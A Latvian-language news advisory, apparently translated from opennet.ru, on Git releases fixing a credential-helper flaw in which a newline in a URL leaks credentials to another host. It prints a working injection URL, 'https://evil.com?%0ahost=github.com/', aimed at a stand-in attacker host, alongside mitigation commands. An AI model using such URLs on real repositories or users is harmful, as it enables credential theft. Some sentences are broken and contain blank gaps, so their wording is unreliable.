Izkliedētā avota vadības sistēmas Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 un 2.17.4 koriģējošie laidieni kas likvidēja () apdarinātājā "", kas izraisa akreditācijas datu nosūtīšanu nepareizajam resursdatoram, kad git klients piekļūst krātuvei, izmantojot īpaši formatētu URL, kurā ir jaunrindas rakstzīme. Ievainojamību var izmantot, lai organizētu akreditācijas datu nosūtīšanu no cita resursdatora uz serveri, kuru kontrolē uzbrucējs.
Norādot URL, piemēram, “https://evil.com?%0ahost=github.com/”, akreditācijas datu apstrādātājs, veidojot savienojumu ar resursdatoru evil.com, nodos vietnei github.com norādītos autentifikācijas parametrus. Problēma rodas, veicot tādas darbības kā "git clone", tostarp apstrādājot vietrāžus URL apakšmoduļiem (piemēram, "git submodule update" automātiski apstrādās .gitmodules failā norādītos URL no krātuves). Ievainojamība ir visbīstamākā situācijās, kad izstrādātājs klonē repozitoriju, neredzot URL, piemēram, strādājot ar apakšmoduļiem, vai sistēmās, kas veic automātiskas darbības, piemēram, pakotņu veidošanas skriptos.
Lai bloķētu ievainojamības jaunajās versijās jaunas rindiņas rakstzīmes nodošana jebkurās vērtībās, kas tiek pārsūtītas caur akreditācijas datu apmaiņas protokolu. Attiecībā uz izplatīšanu lapās varat izsekot pakotņu atjauninājumu izlaišanai , , , , , , .
Kā risinājums problēmas bloķēšanai Neizmantojiet credential.helper, piekļūstot publiskajiem repozitorijiem, un neizmantojiet "git clone" režīmā "--recurse-submodules" ar neatzīmētām krātuvēm. Lai pilnībā atspējotu apdarinātāju credential.helper, kas to dara un paroļu izgūšana no , aizsargāts vai failu ar parolēm, varat izmantot komandas:
git config -- unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Avots: opennet.ru